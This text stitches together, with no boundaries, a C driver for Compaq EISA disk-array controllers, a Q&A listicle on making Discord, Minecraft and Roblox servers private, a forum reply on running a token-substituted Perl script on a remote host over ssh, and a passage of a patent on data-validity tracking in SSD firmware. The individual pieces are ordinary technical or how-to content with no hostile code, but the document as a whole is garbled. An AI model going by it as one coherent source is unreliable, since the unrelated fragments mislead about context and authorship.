int	cac_eisa_l0_intr_pending(struct cac_softc *);
void	cac_eisa_l0_submit(struct cac_softc *, struct cac_ccb *);

struct cfattach cac_eisa_ca = {
	sizeof(struct cac_softc), cac_eisa_match, cac_eisa_attach
};

static const
struct cac_linkage cac_eisa_l0 = {
	cac_eisa_l0_completed,
	cac_eisa_l0_fifo_full,
	cac_eisa_l0_intr_enable,
	cac_eisa_l0_intr_pending,
	cac_eisa_l0_submit
};

static const
struct cac_eisa_type {
	const char *ct_prodstr;
	const char *ct_typestr;
	const struct cac_linkage *ct_linkage;
} cac_eisa_type[] = {
	{ "CPQ4001", "IDA", &cac_eisa_l0 },
	{ "CPQ4002", "IDA-2", &cac_eisa_l0 },
	{ "CPQ4010", "IEAS", &cac_eisa_l0 },
	{ "CPQ4020", "SMART", &cac_eisa_l0 },
	{ "CPQ4030", "SMART-2/E", &cac_l0 },
};

int
cac_eisa_match(parent, match, aux)
	struct device *parent;
	void *match, *aux;
{
	struct eisa_attach_args *ea;
	int i;

	ea = aux;

	for (i = 0; i < sizeof(cac_eisa_type) / sizeof(cac_eisa_type[0]); i++)
		if (strcmp(ea->ea_idstring, cac_eisa_type[i].ct_prodstr) == 0)
			return (1);

	return (0);
}

void
cac_eisa_attach(parent, self, aux)
	struct device *parent;
	struct device *self;
	void *aux;
{
	struct eisa_attach_args *ea;
	bus_space_handle_t ioh;
	eisa_chipset_tag_t ec;
	eisa_intr_handle_t ih;
	struct cac_softc *sc;
	bus_space_tag_t iot;
	const char *intrstr;
	int irq, i;

	ea = aux;
	sc = (struct cac_softc *)self;
	iot = ea->ea_iot;
	ec = ea->ea_ec;

	if (bus_space_map(iot, EISA_SLOT_ADDR(ea->ea_slot) +
	    CAC_EISA_SLOT_OFFSET, CAC_EISA_IOSIZE, 0, &ioh)) {
		printf(": can't map i/o space\n");
		return;
	}

	sc->sc_iot = iot;
	sc->sc_ioh = ioh;
	sc->sc_dmat = ea->ea_dmat;

	/*
	 * Map and establish the interrupt.
	 */
	switch (bus_space_read_1(iot, ioh, CAC_EISA_IOCONF) & 0xf0) {
	case 0x20:
		irq = 10;
		break;
	case 0x10:
		irq = 11;
		break;
	case 0x40:
		irq = 14;
		break;
	case 0x80:
		irq = 15;
		break;
	default:
		printf(": controller on invalid IRQ\n");
		return;
	}

	if (eisa_intr_map(ec, irq, &ih)) {
		printf(": can't map interrupt (%d)\n", irq);
		return;
	}

	intrstr = eisa_intr_string(ec, ih);
	if ((sc->sc_ih = eisa_intr_establish(ec, ih, IST_LEVEL, IPL_BIO,
	    cac_intr, sc, sc->sc_dv.dv_xname)) == NULL) {
		printf(": can't establish interrupt");
		if (intrstr != NULL)
			printf(" at %s", intrstr);
		printf("\n");
		return;
	}

	/*
	 * Print board type and attach to the bus-independent code.
	 */
	for (i = 0; i < sizeof(cac_eisa_type) / sizeof(cac_eisa_type[0]); i++)
		if (strcmp(ea->ea_idstring, cac_eisa_type[i].ct_prodstr) == 0)
			break;

	printf(" %s: Compaq %s\n", intrstr, cac_eisa_type[i].ct_typestr);
	sc->sc_cl = cac_eisa_type[i].ct_linkage;
	cac_init(sc, 0);
}

/*
 * Linkage specific to EISA boards.
 */

int
cac_eisa_l0_fifo_full(struct cac_softc *sc)
{

	return ((cac_inb(sc, CAC_EISAREG_SYSTEM_DOORBELL) &
	    CAC_EISA_CHANNEL_CLEAR) == 0);
}

void
cac_eisa_l0_submit(struct cac_softc *sc, struct cac_ccb *ccb)
{
	u_int16_t size;

	/*
	 * On these boards, `ccb_hdr.size' is actually for control flags.
	 * Set it to zero and pass the value by means of an I/O port.
	 */
	size = letoh16(ccb->ccb_hdr.size) << 2;
	ccb->ccb_hdr.size = 0;

	bus_dmamap_sync(sc->sc_dmat, sc->sc_dmamap, (caddr_t)ccb - sc->sc_ccbs,
	    sizeof(struct cac_ccb), BUS_DMASYNC_PREWRITE | BUS_DMASYNC_PREREAD);

	cac_outb(sc, CAC_EISAREG_SYSTEM_DOORBELL, CAC_EISA_CHANNEL_CLEAR);
	cac_outl(sc, CAC_EISAREG_LIST_ADDR, ccb->ccb_paddr);
	cac_outw(sc, CAC_EISAREG_LIST_LEN, size);
	cac_outb(sc, CAC_EISAREG_LOCAL_DOORBELL, CAC_EISA_CHANNEL_BUSY);
}

struct cac_ccb *
cac_eisa_l0_completed(struct cac_softc *sc)
{
	struct cac_ccb *ccb;
	u_int32_t off;
	u_int8_t status;

	if ((cac_inb(sc, CAC_EISAREG_SYSTEM_DOORBELL) &
	    CAC_EISA_CHANNEL_BUSY) == 0)
		return (NULL);

	cac_outb(sc, CAC_EISAREG_SYSTEM_DOORBELL, CAC_EISA_CHANNEL_BUSY);
	off = cac_inl(sc, CAC_EISAREG_COMPLETE_ADDR);
	status = cac_inb(sc, CAC_EISAREG_LIST_STATUS);
	cac_outb(sc, CAC_EISAREG_LOCAL_DOORBELL, CAC_EISA_CHANNEL_CLEAR);

	if (off == 0)
		return (NULL);

	off = (off & ~3) - sc->sc_ccbs_paddr;
	ccb = (struct cac_ccb *)(sc->sc_ccbs + off);

	bus_dmamap_sync(sc->sc_dmat, sc->sc_dmamap, off, sizeof(struct cac_ccb),
	    BUS_DMASYNC_POSTWRITE | BUS_DMASYNC_POSTREAD);

	ccb->ccb_req.error = status;
	return (ccb);
}

int
cac_eisa_l0_intr_pending(struct cac_softc *sc)
{

	return (cac_inb(sc, CAC_EISAREG_SYSTEM_DOORBELL) &
	    CAC_EISA_CHANNEL_BUSY);
}

void
cac_eisa_l0_intr_enable(struct cac_softc *sc, int state)
{

	if (state) {
		cac_outb(sc, CAC_EISAREG_SYSTEM_DOORBELL,
		    ~CAC_EISA_CHANNEL_CLEAR);
		cac_outb(sc, CAC_EISAREG_LOCAL_DOORBELL,
		    CAC_EISA_CHANNEL_BUSY);
		cac_outb(sc, CAC_EISAREG_INTR_MASK, CAC_INTR_ENABLE);
		cac_outb(sc, CAC_EISAREG_SYSTEM_MASK, CAC_INTR_ENABLE);
	} else
		cac_outb(sc, CAC_EISAREG_SYSTEM_MASK, CAC_INTR_DISABLE);
}
If you are looking for a solution to making a Discord server private, check the helpful tips, tricks, and guides below. We have listed all the related questions to provide the best possible answers.

Disable all permissions for @everyone

1. Head into the Roles tab in your Server Settings menu.
2. Select the default @everyone role and then scroll all the way to the bottom of the permissions page.
3. Once you scroll all the way down, you'll be able to click on the Clear Role Permissions button!

How private are private Discord servers?

Even if no one's snooping on your private streams, Discord shouldn't be treated like a secure line. Your private messages are not end-to-end encrypted, and data breaches are a possibility on any online platform (Discord has a bounty out on vulnerabilities).

Can I hide servers in Discord?

Tap the server's name at the top of your screen. Alternatively, you can tap the three-dot icon to access more options. Once the options appear on your screen, drag the menu up and toggle "Hide muted channels."

Can anyone join my Discord server?

It's important to remember that the only way anyone can access your server is through an invite link, so be careful with who you give it to! Once you've adjusted the settings to your needs, click "Generate a New Link" and your new invite link will appear.

Is Discord really private?

It does use standard encryption but does not provide end-to-end encryption of its video chats. So while Discord does use basic encryption while data is in transit, it does not use the more secure end-to-end encryption that other apps, like Signal or Telegram, use.

Are Discord servers automatically public?

Discord servers are as public as you want them to be. At the start, no one can join your server unless you or someone else has invited them by sharing the server's link. If you post your Discord server's link publicly on a website or anywhere on social media, it will be perceived as public.

Can police track Discord?

Discord works with law enforcement agencies in cases of immediate danger and/or self-harm, pursuant to 18 U.S.C. § 2702. It swiftly reports child abuse material and the users responsible to the National Center for Missing and Exploited Children.

How do I join a private Discord server without an invite?

For example, you can enter discord.gg/devin and click Join Server, which lets you join that Discord server without being invited directly, because the server's link is public.

How do I archive a Discord server?

Open a channel. Tap the three dots icon in the top-right corner. Tap Archive channel. A confirmation message will ask if you're sure you want to archive the channel.

Where is the hidden Discord server?

Select # Text Channel and name the channel something related to the role. Make the channel private by toggling the private setting on. Under "Who can access this channel," select the roles you want to be able to access that channel.

How do I hide Discord activity?

To hide your game activity on Discord, go to your User Settings and then to Activity Privacy. Once you are on the page, uncheck the option labeled "Display current activity as a status message" to stop showing your game activity!

Can I make my Minecraft server private?

First, log in to the SMpicnic Control Panel and navigate to your Server Manager page. Click on the Console tab. To enable the whitelist, enter the command whitelist on.
Your server is now only accessible if a player's Minecraft username has been added to the whitelist.

How do I make my Minecraft server secure?

Hosting providers such as Apex handle the security and DDoS protection for you, and make it easy to ensure that only your friends can join your server.

How do I make my Minecraft server safer?

Don't run the server as administrator, or as any user with admin access. Don't run it as a user that has access to any documents or files you care about. Keep good backups of everything you care about (even if you're not running a server!). Keep your OS, Java, and server up to date with the latest security patches.

How do you make a private server on Roblox?

How do I create and change my server?
1. Click on the Servers tab on the experience's details page.
2. If this feature has been turned on, you will see a section entitled Private Servers.
3. To create a new one, click the Create Private Server button.
4. Give your new server a name.
Re^3: run perl script with cmd line in shell
by MidLifeXis (Monsignor) on Apr 16, 2012 at 13:31 UTC (#965314)
in reply to Re^2: run perl script with cmd line in shell
in thread run perl script with cmd line in shell

3) Embed the command line arguments into the top of your script.pl, perhaps as you are sending it across the wire to perl. This would require some pre-processing of the script and some assumptions about where you can embed the code - if I were to do it this way, I would probably have a token of some sort in the script that I would replace with my parameters
--> The cmd line arguments are also dynamic in nature... but I don't understand this entire statement correctly. Can you give an example?

In your script you could have something like:

# Earlier stuff in the script...
# Fill in the arguments if running remotely
@ARGV = qw(%%REPLACEDTOKEN%%) unless @ARGV;
# ... and back it out if @ARGV should really be empty
@ARGV = () if $ARGV[0] eq '%%REPLACEDTOKEN%%';
# Rest of your script

At this point, you would use something locally to replace '%%REPLACEDTOKEN%%' with your parameters, and pipe that to a perl call on the remote machine.

sed -e .... < script.pl | ssh user@remote perl

I still have concerns that this is the most robust solution to your problem. Do your scripts use any temporary files? If so, I would seriously reconsider your answer to number 2. If you can write temp files, you can also write a temporary perl script.

--MidLifeXis
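The sed expression is elided in the post; as a concrete (hypothetical) illustration of the idea, with foo and bar standing in for the dynamic arguments, the local replacement step might look like this:

```sh
# Substitute the placeholder token with the real arguments,
# then feed the rewritten script to perl on the remote host.
sed -e 's/%%REPLACEDTOKEN%%/foo bar/' script.pl | ssh user@remote perl
```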
DATA VALIDITY TRACKING IN A NON-VOLATILE MEMORY

A computer device reads an indicator from a configuration file that identifies a granularity of units of data at which to track validity. The granularity is one of a plurality of granularities ranging from one unit of data to many units of data. The computer device generates a machine-readable file configured to cause a processing device of a memory system to track validity at the identified granularity using a plurality of data validity counters, with each data validity counter in the plurality of data validity counters tracking validity of a group of units of data at the identified granularity. The computer device transfers the machine-readable file to a memory of the memory system.

Description

TECHNICAL FIELD

The present disclosure generally relates to non-volatile memory, and more specifically, relates to tracking data validity.

BACKGROUND ART

A memory subsystem can be a storage system, such as a solid-state drive (SSD), and can include one or more memory components that store data. The memory components can be, for example, non-volatile memory components and volatile memory components. In general, a host system can utilize a memory subsystem to store data at the memory components and to retrieve data from the memory components. Programmable processing devices control the operation of the memory subsystem. Changing the programming of these processing devices can change the operation of the memory subsystem.

BRIEF DESCRIPTION OF THE DRAWINGS

The disclosure will be understood more fully from the detailed description given below and from the accompanying drawings of various embodiments of the disclosure. The drawings, however, should not be taken to limit the disclosure to the specific embodiments, but are for explanation and understanding only.

FIG. 1 illustrates an example computing environment that includes a memory subsystem in accordance with some embodiments of the present disclosure.
FIGS. 2A through 2D illustrate exemplary data validity maps that track data validity at various granularities of units of data in accordance with some embodiments of the present disclosure.
FIG. 3 is a flow diagram of an example method to generate a machine-readable file for tracking data validity at various granularities in accordance with some embodiments of the present disclosure.
FIG. 4 is an exemplary block diagram of a reclamation process in accordance with some embodiments of the present disclosure.
FIG. 5 is a flow diagram of an example method to reclaim unused portions of memory in accordance with some embodiments of the present disclosure.
FIG. 6 is a block diagram of an example computer system in which embodiments of the present disclosure may operate.

DETAILED DESCRIPTION

Aspects of the present disclosure are directed to data validity tracking in a non-volatile memory subsystem. A memory subsystem is also hereinafter referred to as a "memory device." An example of a memory subsystem is a storage system, such as a solid-state drive (SSD). In some embodiments, the memory subsystem is a hybrid memory/storage subsystem. In general, a host system can utilize a memory subsystem that includes one or more memory components. The host system can provide data to be stored at the memory subsystem and can request data to be retrieved from the memory subsystem.
To facilitate the host system's ability to store and retrieve data from the memory subsystem, the memory subsystem includes one or more processing devices that perform operations such as encoding and decoding, error recovery, compression, address translation, data erasure, and the like. Changing the programming of these one or more processing devices changes the operation of the memory subsystem. Many of the operations performed by the one or more processing devices have both a computational cost (that can add delays to the time required by the host system to read or write to memory) and a memory cost (that can reserve some portion of memory, thereby reducing the amount available to the host system).

Data reclamation is one such operation. Sometimes referred to as "garbage collection" or "folding," data reclamation is a process widely deployed in flash-memory subsystems to reclaim unused portions of memory. Data reclamation addresses the need to erase flash memory in blocks before writing new data to it. When data stored in a memory subsystem is no longer needed (e.g., because the host system "deleted" or rewrote it), the data is not immediately deleted but rather flagged as no longer needed (e.g., "stale"). Because the stale data may be stored with other non-stale data in a portion of memory that is erased as a block, a data reclamation process occasionally moves the non-stale data to another portion of memory so that the block of memory can be erased and made available for new data. Thus, the data reclamation process preserves non-stale or "valid" data while freeing the space associated with the stale or "invalid" data.

Depending on the available computational and memory resources for the processing device(s) included with the memory subsystem, the programming of the memory subsystem can vary, because the computational and memory cost associated with one data reclamation approach may be possible with a memory subsystem designed for one workload but not with another memory subsystem designed for another workload. For example, a memory subsystem targeted toward enterprise-level storage applications may have a larger computational and memory budget, and can therefore support memory subsystem operations offering higher performance relative to a consumer-level memory subsystem. Thus, the operation (and thus programming) of memory subsystems varies from one memory subsystem design to another. As a result, a memory subsystem manufacturer develops many different code versions for each variation or version within its product line. Furthermore, the memory subsystem manufacturer maintains each code version to integrate updates, fixes, etc., complicating the maintenance of the code base for the different memory subsystems.

Aspects of the present disclosure address the above and other deficiencies by automatically and dynamically preparing the firmware and/or software that controls data reclamation operations in a memory subsystem. In this manner, different memory subsystems having different computational and memory budgets do not require the development and maintenance of different code bases for each memory subsystem. Additionally, aspects of the present disclosure address the above and other deficiencies through various implementations of the data reclamation process that can maintain the computational cost of the data reclamation process while reducing the associated memory cost.
The reduced memory cost can include reducing the footprint of a validity table that informs the data reclamation process which data is stale or not, and the footprint of address translation tables that are used during operation to translate "logical" addresses associated with read or write commands from a host system into "physical" addresses corresponding to the location or locations within the memory subsystem where the data is actually stored.

FIG. 1 illustrates an example computing environment 100 that includes a memory subsystem 110 in accordance with some embodiments of the present disclosure. The memory subsystem 110 can include media, such as memory components 112A to 112N. The memory components 112A to 112N can be volatile memory components, non-volatile memory components, or a combination of such. In some embodiments, the memory subsystem is a storage system. An example of a storage system is a SSD. In some embodiments, the memory subsystem 110 is a hybrid memory/storage subsystem.

In some embodiments, the computing environment 100 includes a computer system 120 that can transfer new or updated programming to the memory subsystem 110. For example, the computer system 120 can store programming information to the controller memory 119. In other embodiments, the computer system 120 uses the memory subsystem 110 for data storage and retrieval operations from the memory components 112A to 112N. For example, the computer system 120 can write data to the memory subsystem 110 and read data from the memory subsystem 110.

The computer system 120 can be a computing device such as a desktop computer, laptop computer, memory programming device, network server, or mobile device, or a similar computing device that includes a processing device 121 and a memory 122. The computer system 120 can include or be coupled to the memory subsystem 110 so that the computer system 120 can read data from or write data to the memory subsystem 110. The computer system 120 can be coupled to the memory subsystem 110 via a physical interface. In some embodiments, the computer system 120 is coupled to a component of the memory subsystem 110, such as the controller memory 119, either prior to or during manufacture of the memory subsystem. As used herein, "coupled to" generally refers to a connection between components, which can be an indirect communicative connection or direct communicative connection (e.g., without intervening components), whether wired or wireless, including connections such as electrical, optical, magnetic, etc. Examples of a physical interface include, but are not limited to, a serial advanced technology attachment (SATA) interface, a peripheral component interconnect express (PCIe) interface, a universal serial bus (USB) interface, Fibre Channel, Serial Attached SCSI (SAS), JTAG (IEEE 1149), etc. The physical interface can be used to transmit data between the computer system 120 and the memory subsystem 110. The computer system 120 can further utilize an NVM Express (NVMe) interface to access the memory components 112A to 112N when the memory subsystem 110 is coupled with the computer system 120 by the PCIe interface. The physical interface can provide an interface for passing control, address, data, and other signals between the memory subsystem 110 and the computer system 120.

In the illustrated embodiment of computer system 120, memory 122 includes code 124 and configuration data 125. For example, the code 124 can be human-readable software (e.g., written in C, C++, etc.)
and/or firmware (e.g., written in a hardware description language, etc.) and other files (e.g., libraries, etc.) that were developed to support multiple different memory subsystems. The configuration data 125 includes a configuration parameter 126 to adjust the granularity at which data validity is tracked, as described below. A compiler or other development tool executed in the computer system 120 (not shown) converts the human-readable software/firmware, using the configuration data 125, into one or more machine-readable files including instructions or configuration data to program and/or configure the controller 115 to perform the functions described herein. In other embodiments, the computer system 120 uses, but does not program, the memory subsystem 110 (e.g., the memory 122 does not include the code 124 and configuration data 125). The memory components 112A to 112N can include any combination of the different types of non-volatile memory components and/or volatile memory components. An example of non-volatile memory components includes a negative-and (NAND) type flash memory. Each of the memory components 112A to 112N can include one or more arrays of memory cells such as single level cells (SLCs) or multi-level cells (MLCs) (e.g., triple level cells (TLCs) or quad-level cells (QLCs)). In some embodiments, a particular memory component can include both an SLC portion and a MLC portion of memory cells. Each of the memory cells can store one or more bits of data (e.g., data blocks) used by the computer system 120. Although non-volatile memory components such as NAND type flash memory are described, the memory components 112A to 112N can be based on any other type of memory such as a volatile memory. In some embodiments, the memory components 112A to 112N can be, but are not limited to, random-access memory (RAM), read-only memory (ROM), dynamic RAM (DRAM), synchronous DRAM (SDRAM), phase change memory (PCM), magneto RAM (MRAM), negative-or (NOR) flash memory, electrically erasable programmable read-only memory (EEPROM), and a cross-point array of non-volatile memory cells. A cross-point array of non-volatile memory can perform bit storage based on a change of bulk resistance, in conjunction with a stackable cross-gridded data access array. Additionally, in contrast to many flash-based memories, cross-point non-volatile memory can perform a write in-place operation, where a non-volatile memory cell can be programmed without the non-volatile memory cell being previously erased. Furthermore, the memory cells of the memory components 112A to 112N can be grouped as memory pages or data blocks that can refer to a unit of the memory component used to store data. The memory subsystem controller 115 (hereinafter referred to as “controller”) can communicate with the memory components 112A to 112N to perform operations such as reading data, writing data, or erasing data at the memory components 112A to 112N and other such operations. The controller 115 can include hardware such as one or more integrated circuits and/or discrete components, a buffer memory, or a combination thereof. The controller 115 can be a microcontroller, special purpose logic circuitry (e.g., a field programmable gate array (FPGA), an application specific integrated circuit (ASIC), etc.), or other suitable processor. The controller 115 can include a processor (processing device) 117 configured to execute instructions stored in controller memory 119. 
In the illustrated example, the controller memory 119 of the controller 115 includes an embedded memory configured to store instructions for performing various processes, operations, logic flows, and routines that control operation of the memory subsystem 110, including handling communications between the memory subsystem 110 and the computer system 120. In some embodiments, the computer system 120 stores these instructions in the controller memory 119. In some embodiments, the controller memory 119 can include memory registers storing memory pointers, fetched data, etc. The controller memory 119 can also include read-only memory (ROM) for storing code (e.g., microcode) received from the computer system 120. In some embodiments, the instructions/configuration data 118 includes data from the machine-readable files generated by the compiler or other development tool by the computer system 120. The instructions/configuration data 118 can be executed by or can configure components of the memory subsystem 110, such as the processor 117 or the reclamation manager 113. While the example memory subsystem 110 in FIG. 1 has been illustrated as including the controller 115, in another embodiment of the present disclosure, a memory subsystem 110 may not include a controller 115, and may instead rely upon external control (e.g., provided by an external host, or by a processor or controller separate from the memory subsystem). In some embodiments, the controller memory 119 can also include DRAM and/or static RAM (SRAM) to store data for the various processes, operations, logic flows, and routines performed by the controller 115. One such type of data is a validity map 116. As described below, the validity map 116 includes data used during the data reclamation process to identify valid and invalid data. In general, the controller 115 can receive commands or operations from the computer system 120 and can convert the commands or operations into instructions or appropriate commands to achieve the desired access to the memory components 112A to 112N. In some embodiments, the controller 115 includes command support to allow the computer system 120 to program the controller memory 119. The controller 115 can be responsible for other operations such as wear leveling operations, garbage collection operations, error detection and error-correcting code (ECC) operations, encryption operations, caching operations, and address translations between a logical block address and a physical block address that are associated with the memory components 112A to 112N. In some embodiments, the controller 115 maintains one or more address lookup tables in a portion of the media (e.g., memory components 112A to 112N). In some embodiments, the controller 115 may fetch and cache portions of the table(s) in the controller memory 119. Using a logical-to-physical address lookup table, the controller 115 can obtain a physical address of data given its logical address (e.g., from the computer system 120). Depending on the level of granularity at which data validity is tracked, the controller 115 may use a physical-to-logical address lookup table to lookup a logical address for a particular physical address (e.g., during data reclamation, as described herein). In some embodiments, the physical-to-logical address lookup table may not be necessary if the granularity at which the controller 115 tracks data validity is sufficiently fine, as described herein. 
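To make the role of these lookup tables concrete, here is a minimal C sketch of an out-of-place write and the corresponding logical-to-physical lookup. It is illustrative only: the flat-array layout, the 32-bit physical addresses, and the names (l2p, write_tu) are assumptions, not details from the disclosure.

    #include <stdint.h>

    #define NUM_TUS 1024u  /* hypothetical media size, in translation units */

    /* Logical-to-physical table, indexed by logical TU address. */
    uint32_t l2p[NUM_TUS];

    /* Host read path: one lookup maps a logical address to the physical
     * location where the TU was most recently written. */
    uint32_t lookup_physical(uint32_t logical)
    {
        return l2p[logical];
    }

    /* Out-of-place write: new data lands at a fresh physical location and
     * the table entry is repointed. The old copy becomes stale but still
     * occupies media until a reclamation pass erases its block. */
    void write_tu(uint32_t logical, uint32_t new_physical)
    {
        l2p[logical] = new_physical;
    }

A physical-to-logical table would be the inverse mapping; as the paragraph above notes, whether it is worth provisioning depends on how finely validity is tracked.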
The controller 115 can further include interface circuitry to communicate with the computer system 120 via the physical interface. The interface circuitry can convert the commands received from the computer system 120 into command instructions to access the memory components 112A to 112N, as well as convert responses associated with the memory components 112A to 112N into information for the computer system 120.

The memory subsystem 110 can also include additional circuitry or components that are not illustrated. In some embodiments, the memory subsystem 110 can include a cache or buffer (e.g., DRAM) and address circuitry (e.g., a row decoder and a column decoder) that can receive an address from the controller 115 and decode the address to access the memory components 112A to 112N.

The memory subsystem 110 includes a reclamation manager component 113 that can be used to reclaim portions of media based on the validity map 116. In some embodiments, the controller 115 includes at least a portion of the reclamation manager component 113. For example, the controller 115 can include a processor 117 (processing device) configured to execute instructions stored in controller memory 119 for performing the operations described herein. In some embodiments, the reclamation manager component 113 is part of the computer system 120, an application, or an operating system. The reclamation manager component 113 can identify a portion of memory to be reclaimed, determine which data within the portion of memory is used versus which data is unused, move the used data to another portion of memory, and erase the portion of memory being reclaimed. Further details with regards to the operations of the reclamation manager component 113 are described below.

A variety of data organization schemes can be employed to aid in the management of the media. In one embodiment, a translation unit (TU) is the smallest granularity tracked across the address translation layer (from logical to physical addresses and vice versa). A TU comprises metadata and user data. In some embodiments, the size of the user data in a TU is an integer multiple of the logical block addressing sector size. For example, if each address in the logical address space identifies a 512-byte sector, the size of the user data may be eight times the sector size, or 4,096 bytes. The metadata in a TU includes logical address information for the user data. Thus, when the computer system 120 writes user data to the memory subsystem at a logical address, the controller stores a TU, including the user data and metadata identifying the logical address, at a particular physical location within the media.

TUs may be grouped to form higher logical groups at coarser levels of granularity. For example, four TUs can be grouped into a page. Four pages can be grouped to form a multiplane. Multiplanes may reside on a single memory component 112 or span multiple memory components 112A-112N to form a page stripe. Multiple page stripes can be grouped to form a block stripe. Other embodiments may include different group sizes, different numbers of granularity levels, and different layouts. The controller 115 can issue read or write operations at the varying levels of granularity, subject to varying levels of performance. For example, some embodiments may exhibit increased latency with each increase in granularity (e.g., a TU read operation is faster than a page read operation; a page read operation is faster than a multiplane read operation, etc.).
Other embodiments may have an operation latency that is comparable for multiple levels of granularity. For example, in embodiments where a TU, page, and multiplane are resident within a single memory component 112, the read latency associated with those logical groups may be comparable (e.g., 100 microseconds). If a block stripe spans multiple memory components 112A-112N, the read latency associated with the block stripe may scale upwards as the number of memory components increases (e.g., 100N microseconds, where N is the number of memory components 112 that the block stripe spans).

FIGS. 2A through 2D illustrate exemplary data validity maps that track data validity at various granularities of units of data in accordance with some embodiments of the present disclosure. Depending on the configuration data 125, the controller 115 tracks data validity at different levels of granularity. The exemplary validity maps 116 in FIGS. 2A through 2D are based on the four levels of granularity described above (TU, page, multiplane, block stripe) and assume a block stripe size of 64 TUs, at four TUs per page, four pages per multiplane, and four multiplanes per block stripe.

In FIG. 2A, the configuration data 125 specifies that the validity map tracks data at the TU level of data granularity. Validity map 116A illustrates a validity map at the TU level of granularity. The validity map 116A comprises a counter for each TU of each block stripe. The counter represents a number of TUs having valid data. Because the granularity in this example is one TU, a single-bit counter 205A represents the validity of the TU (e.g., '1' means valid, '0' means invalid). Based on the 64-TU block stripe, the total footprint for validity map 116A in controller memory 119 is thus 64 times the number of block stripes that fit within the media (64 bits×number of block stripes).

In FIG. 2B, the configuration data 125 specifies that the validity map tracks data at the page level of data granularity. Validity map 116B illustrates a validity map at the page level of granularity. The validity map 116B comprises a counter for each page of each block stripe. The counter represents the number of TUs within the page having valid data. Because the granularity in this example is one page (and assuming there are four TUs per page), the validity map 116B stores a three-bit counter 205B per page to represent five possible states (e.g., no valid TUs, one valid TU, two valid TUs, three valid TUs, or four valid TUs). Based on the 64-TU block stripe, the total footprint for validity map 116B in controller memory 119 is thus 48 times the number of block stripes that fit within the media (3 bits/page×16 pages×number of block stripes).

In FIG. 2C, the configuration data 125 specifies that the validity map tracks data at the multiplane level of data granularity. Validity map 116C illustrates a validity map at the multiplane level of granularity. The validity map 116C comprises a counter for each multiplane of each block stripe. The counter represents the number of TUs within the multiplane having valid data. Because the granularity in this example is one multiplane (and assuming there are sixteen TUs per multiplane), the validity map 116C stores a five-bit counter 205C per multiplane to represent seventeen possible states (e.g., no valid TUs, one valid TU, two valid TUs, up through sixteen valid TUs).
Based on the 64-TU block stripe, the total footprint for validity map 116C in controller memory 119 is thus 20 times the number of block stripes that fit within the media (5 bits/multiplane×4 multiplanes×number of block stripes).

In FIG. 2D, the configuration data 125 specifies that the validity map tracks data at the block stripe level of data granularity. Validity map 116D illustrates a validity map at the block stripe level of granularity. The validity map 116D comprises a count for each block stripe. The count represents the number of TUs within the block stripe having valid data. Because the granularity in this example is one block stripe (and assuming there are 64 TUs per block stripe), the validity map 116D stores a seven-bit count 205D per block stripe to represent sixty-five possible states (e.g., no valid TUs, one valid TU, two valid TUs, up through sixty-four valid TUs). Based on the 64-TU block stripe, the total footprint for validity map 116D in controller memory 119 is thus 7 times the number of block stripes that fit within the media (7 bits/block stripe×number of block stripes).

As the above description of validity maps 116A-D illustrates, the coarser the granularity at which data validity is tracked, the lower the memory footprint of the validity map within controller memory 119. Thus, controller 115 provisions an amount of space in memory for the validity map 116 based on the configuration data 125.

FIG. 3 is a flow diagram of an example method to generate a machine-readable file for tracking data validity at various granularities in accordance with some embodiments of the present disclosure. The method 300 can be performed by processing logic that can include hardware (e.g., processing device, circuitry, dedicated logic, programmable logic, microcode, hardware of a device, integrated circuit, etc.), software (e.g., instructions run or executed on a processing device), or a combination thereof. In some embodiments, the method 300 is performed by the processor 121 of FIG. 1. Although shown in a particular sequence or order, unless otherwise specified, the order of the processes can be modified. Thus, the illustrated embodiments should be understood only as examples, and the illustrated processes can be performed in a different order, and some processes can be performed in parallel. Additionally, one or more processes can be omitted in various embodiments. Thus, not all processes are required in every embodiment. Other process flows are possible.

In some embodiments, the process begins in response to a command from a user such as a developer. At block 310, the processing device reads one or more files containing code (e.g., code 124) used to generate the firmware and/or software that controls a memory subsystem. These files are part of a single code base that supports multiple different memory subsystems. At block 310, the processing device further reads configuration data such as configuration data 125. The configuration data may be specific to a single memory subsystem or associated with a proper subset of the memory subsystems supported by the code base. The processing device obtains an indicator that identifies a granularity of units of data at which to track validity. The indicator may designate one of the various units of data, such as the TU, page, multiplane, or block stripe described herein, or units based on some other data organization scheme.
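The counter widths above follow from the number of states each counter must represent (a counter covering n TUs needs enough bits for n+1 states). The following C sketch reproduces that arithmetic for the 64-TU block stripe layout, including the 10-kilobit budget check used in the dynamic-selection example of the next paragraph; the figures come from the text, while the code structure and names are assumptions.

    #include <stdio.h>

    /* Bits needed for a counter that must represent 0..n valid TUs. */
    static unsigned counter_bits(unsigned n)
    {
        unsigned bits = 0;
        while ((1u << bits) < n + 1u)  /* smallest width with > n states */
            bits++;
        return bits;
    }

    int main(void)
    {
        /* 64-TU block stripe: groups per stripe at each granularity. */
        static const struct {
            const char *name;
            unsigned groups;
            unsigned tus_per_group;
        } lvl[] = {
            { "TU",           64,  1 },
            { "page",         16,  4 },
            { "multiplane",    4, 16 },
            { "block stripe",  1, 64 },
        };
        const unsigned stripes = 1000, budget_bits = 10000;

        for (unsigned i = 0; i < 4; i++) {
            unsigned per_stripe = lvl[i].groups * counter_bits(lvl[i].tus_per_group);
            unsigned total = per_stripe * stripes;
            printf("%-12s %2u bits/stripe, %6u bits total%s\n",
                   lvl[i].name, per_stripe, total,
                   total <= budget_bits ? "  <- fits the budget" : "");
        }
        return 0;
    }

Run as-is, this prints 64, 48, 20, and 7 bits per block stripe, matching validity maps 116A through 116D; with 1,000 block stripes, only the block-stripe level (7,000 bits) fits the 10-kilobit budget.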
In some embodiments, the indicator is dynamically calculated based on configuration data that specifies the total amount of memory whose validity is tracked relative to the amount of space available for the validity map. For example, the configuration data could indicate that the media contains space for 1,000 validity-tracked block stripes and that the validity map cannot exceed 10 kilobits of memory. Based on the data organization described herein and the validity maps described with reference to FIGS. 2A through 2D, the processing device determines that validity is tracked at the block stripe level, because at 7 bits per block stripe the validity map (7,000 bits) fits within 10 kilobits, while a validity map tracked at the multiplane level of granularity (20 bits per block stripe) would require more memory than is available. One or more of the files read at block 310 may be stored in a version-controlled storage repository maintained by the manufacturer or code developer.

At block 315, the processing device generates a machine-readable file configured to cause a processing device associated with the memory subsystem to track validity at the identified granularity using a plurality of data validity counters, each data validity counter in the plurality of data validity counters tracking validity of a group of units of data at the identified granularity. The file may be firmware and/or software in a binary file, an executable file, or some other file readable by the controller 115.

